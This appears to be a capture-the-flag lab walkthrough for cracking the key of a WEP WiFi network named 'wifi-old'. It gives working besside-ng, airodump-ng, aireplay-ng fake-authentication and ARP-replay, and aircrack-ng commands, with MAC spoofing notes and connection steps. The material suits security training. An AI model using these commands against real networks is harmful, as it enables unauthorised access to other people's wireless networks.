WEP
How to hack WEP wifi Passwords
07. Get wifi-old password
Get wifi-old password. FLAG: Pass in hex
In the following screenshot we can see how the AP has a client connected with traffic.
sudo airodump-ng wlan0mon --manufacturer --wps -c 3
The network is a WEP with a client, so we can use besside-ng to get the password automatically.
airmon-ng check kill
sudo besside-ng -c 3 -b F0:9F:C2:71:22:11 wlan2 -v1. sudo (Run as Root)
sudo (Run as Root)besside-ngrequires root privileges to access wireless interfaces, sosudois needed.
2. besside-ng (Automated WEP/WPA Attack Tool)
besside-ng (Automated WEP/WPA Attack Tool)A tool that automatically captures handshakes for WPA/WPA2 networks and cracks WEP encryption.
3. -c 3 (Target Channel 3)
-c 3 (Target Channel 3)This forces
besside-ngto only scan and attack Wi-Fi networks on channel 3.Useful for faster attack execution instead of scanning all channels.
4. -b F0:9F:C2:71:22:11 (Target Specific BSSID)
-b F0:9F:C2:71:22:11 (Target Specific BSSID)F0:9F:C2:71:22:11 is the BSSID (MAC address of the target router/AP).
Ensures
besside-ngattacks only this specific access point rather than scanning for all available networks.
5. wlan2 (Wireless Interface)
wlan2 (Wireless Interface)Specifies that
wlan2is the wireless adapter being used.
6. -v (Verbose Mode)
-v (Verbose Mode)Enables detailed output for better tracking of the attack progress.
Alternate Method
In case we want to do it manually:
There is a client active on this WEP network. This makes it easier to capture enough data to crack the password.
Capture data into a file, this file is input for aircrack-ng to crack the password.
sudo airodump-ng -c 3 --bssid F0:9F:C2:71:22:11 -w wifi-old wlan0mon
To generate some extra data to the AP we can launch a fake authentication to the AP (at the same time)
sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0mon1. sudo (Run as Root)
sudo (Run as Root)Required because
aireplay-ngneeds administrative privileges to interact with the network card.
2. aireplay-ng (Packet Injection Tool)
aireplay-ng (Packet Injection Tool)Part of the Aircrack-ng suite, used to inject packets into a wireless network.
3. -1 (Fake Authentication Mode)
-1 (Fake Authentication Mode)Used to authenticate with a WEP-protected access point (AP).
Needed when the AP requires client authentication before allowing traffic.
4. 3600 (Keep Connection for 3600 Seconds)
3600 (Keep Connection for 3600 Seconds)Sets the fake authentication timeout to 3600 seconds (1 hour).
Ensures the attack stays authenticated for a longer period.
5. -q 10 (Quiet Mode, Sends Authentication Every 10 Seconds)
-q 10 (Quiet Mode, Sends Authentication Every 10 Seconds)Sends keep-alive authentication requests every 10 seconds to stay connected.
Prevents the AP from disconnecting the fake client.
6. -a F0:9F:C2:71:22:11 (Target BSSID)
-a F0:9F:C2:71:22:11 (Target BSSID)Specifies the MAC address of the target access point (AP).
7. wlan0mon (Monitor Mode Interface)
wlan0mon (Monitor Mode Interface)The wireless interface in monitor mode (previously enabled using
airmon-ng).
And generate some traffic by launching an ARP-request replay attack (at the same time)
sudo aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0mon1. sudo (Run as Root)
sudo (Run as Root)Executes the command with root privileges, which is necessary for packet injection and monitoring.
2. aireplay-ng (Packet Injection Tool)
aireplay-ng (Packet Injection Tool)Part of the Aircrack-ng suite, this tool is used to inject packets into the wireless network.
3. --arpreplay (ARP Replay Attack)
--arpreplay (ARP Replay Attack)This option injects captured ARP (Address Resolution Protocol) packets into the network.
The goal is to force the target access point (AP) to generate more initialization vectors (IVs).
The injected ARP packets trigger responses from the AP, which helps in speeding up the process of collecting enough IVs to crack WEP encryption.
4. -b F0:9F:C2:71:22:11 (Target BSSID)
-b F0:9F:C2:71:22:11 (Target BSSID)The BSSID (MAC address) of the target access point (AP). This is the AP that you are attacking, and you want to inject ARP packets towards this specific AP.
5. -h 02:00:00:00:00:00 (Source MAC Address)
-h 02:00:00:00:00:00 (Source MAC Address)The source MAC address you are using in the attack.
It represents the fake client MAC address. If the AP checks for authentication, this address should either match a legitimate client’s MAC or be a spoofed MAC address to bypass security.
6. wlan0mon (Monitor Mode Interface)
wlan0mon (Monitor Mode Interface)The monitor mode interface used to perform the attack. This interface allows you to capture and inject packets on the network. Make sure
wlan0monis in monitor mode (you can verify this withiwconfig).
While this is running we could try crack the password Crack the password with the data captured in a command earlier. (at the same time)
sudo aircrack-ng wifi-old-01.cap
Once we have the password we can connect to the WEP network:
Create a configuration file to connect to the WEP network.
nano wep.confThe content should look like this.
network={
ssid="wifi-old"
key_mgmt=NONE
wep_key0=11BB33CD55
wep_tx_keyidx=0
}Now we can connect to the WEP network with our configuration file.
sudo wpa_supplicant -D nl80211 -i wlan2 -c wep.confWe should try to retrieve an IP address from the DHCP server.
sudo dhclient wlan2 -v
And now we can access http://192.168.1.1 to verify that we are connected.
Last updated